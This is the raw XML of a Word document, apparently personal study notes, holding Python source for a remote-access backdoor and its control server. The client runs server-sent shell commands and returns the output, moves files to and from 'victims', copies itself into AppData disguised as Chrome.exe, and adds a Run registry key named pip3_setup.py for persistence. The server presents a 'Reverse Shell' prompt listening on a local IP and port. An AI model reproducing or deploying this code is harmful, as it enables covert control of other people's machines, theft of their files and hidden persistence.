    <w:p w14:paraId="2CF44D2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Allow SERVER to send 'upload' command to victims machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334074A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To start downloading files from victims</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC93B2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[: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6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]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'upload'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24EF68B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If command[7:] from SERVER == 'upload'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F90FFA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this client (victims) calls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download_file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(command[7:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ABCAC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download_file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7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:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019042B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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B2B7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else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429F195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Execute the 'command' received from Server using process open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9B40C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using subprocess module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B102C1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execute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subprocess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Popen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shell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True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stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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subprocess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PIPE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stderr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subprocess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PIPE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stdin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subprocess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PIPE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5678517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result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execute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stdout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read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()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+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execute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stderr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read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60DAE7C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We get encoded data 'result' from 2 lines above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FB709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execute =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subprocess.Popen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(command, shell=True,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stdout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=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subprocess.PIPE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, stderr=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subprocess.PIPE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, stdin=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subprocess.PIPE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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711A8DB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result =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execute.stdout.read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() +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execute.stderr.read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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BBAF4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It will throw us an Error if we do NOT decode result from above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153FEBC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result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result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decode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5044A82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reliable_send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result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74F3B3D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4447FB0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============= Gaining persistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1875276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 common C:\Users\USER\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AppData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\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Programs\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Chrome.exe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;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6175BD0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location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os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environ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"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appdata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"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]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+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"</w:t>
      </w:r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\\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Microsoft</w:t>
      </w:r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\\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Windows</w:t>
      </w:r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\\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Start Menu</w:t>
      </w:r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\\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Programs</w:t>
      </w:r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\\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Chrome.exe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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE0FC1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5E33328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If 'location' does NOT exist, it's 1st time running this Backdoor client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2645C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704FA9D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not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os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path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exists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location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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B34D46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    # Performing copying action of our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Backdoor.exe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to User's /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AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74C5987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shutil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copyfile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sys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executable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location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5B77ACC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    # Allow users to proactively connect to our backdoor server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192D3A1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    # whenever they login to their machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7719993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    #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1769D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    # Appending machine startup .exe permissions to Victims' Windows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regkey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at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1943F9A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    #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HKEY_CURRENT_USER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\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCD5D5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    # /v = Name; /t = Type; /d = Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6484005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subprocess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call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'reg add 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HKCU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\Software\Microsoft\Windows\CurrentVersion\Run /v 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pip3_setup.py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 /t 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REG_SZ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 /d "'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+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location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+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'"'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shell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True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370D187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else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0C705C6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AF_INET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SOCK_STREAM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4D96C19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Bind socket =&gt; connection() =&gt; shell() =&gt; Call connection()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D078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connection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5C66D22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5A284D84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732A834" w14:textId="77777777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49F7BF4" w14:textId="77777777" w:rsidR="00B92E1E" w:rsidRDefault="00B92E1E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4D6BB845" w14:textId="6F993BFE" w:rsidR="006D2D76" w:rsidRDefault="006D2D76" w:rsidP="006D2D7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lastRenderedPageBreak/>
        <w:t>server.py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51CAFBA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</w:p>
    <w:p w14:paraId="73254D6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json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7917151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import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os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05905DA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0E64E0B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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B92E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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>IP_ADDRESS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'192.168.0.16'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0D0C7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Port no. &gt; 1000 is OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A512F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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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54321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D57BB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05F85AE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Passing 'data' as an argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C4ED1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'data' = command we send to victims</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C897F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reliable_send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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7BE92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jsondata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json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dumps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62AC5D0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target = target,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=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sock.accept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() below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0978AF0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jsondata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has to be encoded to send ascii to victims as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BYTEs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75E06EB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target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send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jsondata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encode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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E038ED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</w:p>
    <w:p w14:paraId="298C72D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reliable_recv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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1EE26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Preparing to store data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DF33C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''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D2F86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while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True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0090FC8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try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5533E6A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Specify amount of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BYTEs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we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wanna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receive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4325B12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Cuz data sending from victims are encoded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BYTEs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1809E17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Need to decode it upon receiving using .decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1C345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Need to trim the fucking '\n' '\r' to avoid errors using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rstrip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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B11468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+=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target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1024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decode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().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rstrip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50CB56C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returning results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CBD5F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return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json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loads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data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5DDB88B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except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ValueError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as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4A18D29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When we receive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ValueError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from execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355392D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We continue the execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6236285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print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'Error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 occurred: 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{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}</w:t>
      </w:r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\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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n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Continuing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...'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52B6555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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F4CC3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</w:p>
    <w:p w14:paraId="454C0DA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Allow Server to upload simple files to victims</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B3F90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Similar to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upload_file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): in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client.py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4064B6E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upload_file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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CA0C2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open File from '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' =&gt; command[9:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C40B8D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read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btyes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69FEE79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open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rb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7307788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target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send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read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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A6AEE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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158FA24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SERVER download simple files from victims' machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4250CAD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Callback used to download files from victims' machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3082920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Server =&gt; download files from victims' machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C28F8B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Client =&gt; upload files to Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD9C2E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lastRenderedPageBreak/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download_file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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F178DA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open file object 'f' using </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A3440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'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wb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' =&gt; write bytes to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63755EA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***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BD7A5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open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file_name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wb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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080B72F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***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A461DE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If timeout is NOT set, sometimes program will get stuck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF6459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target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settimeout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1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38D98D4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print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'Starting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 to receive bytes in chunks from simple files...'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0D0E80B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</w:p>
    <w:p w14:paraId="006CB9B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Receive data from multiple chunks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661E1F3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try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2C9F4FA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chunk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target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1024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76BE949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As long as there's something in chunk variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0857ABD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while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chunk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266927E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Writing the chunk into file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2CDB5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write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chunk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72E6FC8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2271DCA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print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'Server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 is writing chunks of 1024 bytes of simple files from victims...'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052A827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chunk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target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1024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4ADC68A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If there's any errors =&gt; reached End of file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A86CF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except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timeout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as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4C6941C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print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'Server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 has no pending 1024-byte chunks in queue...</w:t>
      </w:r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\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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n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Exiting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...</w:t>
      </w:r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\n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7D0E624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finally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2BDC89C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target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settimeout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None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469F087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Close file upon complete sending files from victims</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1571C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close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77BB05B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print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f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'This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 server is closing open-file on victims</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92E1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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\'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 xml:space="preserve"> machines'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5CD6DAD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</w:p>
    <w:p w14:paraId="3996BED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def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target_communication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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6723987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while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True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5B9DEC9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Once we type in str(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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54896BD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str(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) display as =&gt; * Reverse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Shell~str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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FBDA6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= target,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=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sock.accept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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F7329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input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'* Reverse Shell~</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92E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%s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: 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%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str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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045D483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 callback to send commands to victims</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A7383A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reliable_send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6F24B3E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</w:p>
    <w:p w14:paraId="6E17876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Server command input 'q' to exit shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B2617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if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'q'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315122F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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B71B5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From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beginnging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 up to 3rd CHAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9FFE7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'cd' command do nothing on Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F207B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'cd' command works in client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171F450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[: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3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]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'cd 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25A740C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From 3rd CHAR till the end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6D177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lastRenderedPageBreak/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Print present working directory after 'cd'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20291B4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For Linux </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6408225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try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271B7D7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   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os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system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pwd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64A907B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For Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439A9867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except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ValueError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as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1CD590D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   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os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system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proofErr w:type="spellStart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dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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482277C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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D58CCF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Executing 'clear' on Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BB7C1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'clear'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6D936054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os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system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'clear'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49E373A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'vim' command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D87EE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[: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4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]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'vim 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4D88FDF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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B84DB35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Download files from victims' machines to this SERVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DA433D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'download path/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file.txt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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5263D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If first 8 CHAR == 'download'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CCD91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[: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8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]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'download'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7EB0303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download_file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9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:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4836ECB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Upload files to victims' machine from this SERVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2546E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proofErr w:type="spellStart"/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elif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[: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6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]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'upload'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771E253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File starts from 7th CHAR till end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A86C7C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upload_file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command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[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7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:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAA456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</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92E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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>else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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423557C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 callback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13758C12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To receive results from victims once we fire our commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8B3E0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result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reliable_recv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3BD80BF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Printing result from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reliable_recv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() to Server screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5069C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return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json.loads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(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F80AE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        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print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result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2BC8396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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4F28AB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sock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AF_INET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proofErr w:type="spellStart"/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socket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SOCK_STREAM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66D7F27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Binding our Server IP to the PORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057D06D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sock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bind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((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B92E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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>IP_ADDRESS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r w:rsidRPr="00B92E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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>PORT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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287B15A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print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'[+] Listening for Incoming connections ;)'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14FA9B6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Listening up to 5 connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D29BD26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sock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listen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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754A541C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sock.accept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() accepting target socket object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F89B95F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 xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sock.accept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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() accepting target IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21994D73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target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,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=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sock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.</w:t>
      </w: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accept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113D09C0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print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r w:rsidRPr="00B92E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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'[+] Target connected from: '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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>+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92E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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B92E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ip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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DABBD7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7090CA08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A function acting as a callback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA39781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92E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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t># handling victims' communications to our server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F820C9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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B92E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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>target_communication</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B92E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>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550E684E" w14:textId="77777777" w:rsidR="00B92E1E" w:rsidRPr="00B92E1E" w:rsidRDefault="00B92E1E" w:rsidP="00B92E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</w:p>
    <w:p w14:paraId="40B82318" w14:textId="77777777" w:rsidR="006D2D76" w:rsidRDefault="006D2D76"/>
    <w:sectPr w:rsidR="006D2D7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D76"/>
    <w:rsid w:val="001D52CF"/>
    <w:rsid w:val="0020171E"/>
    <w:rsid w:val="003C0CEE"/>
    <w:rsid w:val="00667752"/>
    <w:rsid w:val="006D2D76"/>
    <w:rsid w:val="0073097D"/>
    <w:rsid w:val="00766331"/>
    <w:rsid w:val="00896962"/>
    <w:rsid w:val="00954A2F"/>
    <w:rsid w:val="00B40178"/>
    <w:rsid w:val="00B844D2"/>
    <w:rsid w:val="00B92E1E"/>
    <w:rsid w:val="00C74A9E"/>
    <w:rsid w:val="00D55A17"/>
    <w:rsid w:val="00DD44D9"/>
    <w:rsid w:val="00E931F1"/>
    <w:rsid w:val="00F0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9BC60"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{58DCE799-190C-4C2E-9281-96FCD56A5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D2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D2D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0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2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hyperlink" Target="file:///\\pip3_setup.exe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users.cs.fiu.edu/~esj/cgs4285/class11.html" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/7846442/why-the-ip-fragments-must-be-in-multiples-of-8-bytes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s://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level" TargetMode="External"/><Relationship Id="rId40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26</Pages>
  <Words>2511</Words>
  <Characters>14316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Berlin Dot</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Berlin Dot</cp:lastModifiedBy>
  <cp:revision>48</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-06T03:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-12T10:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>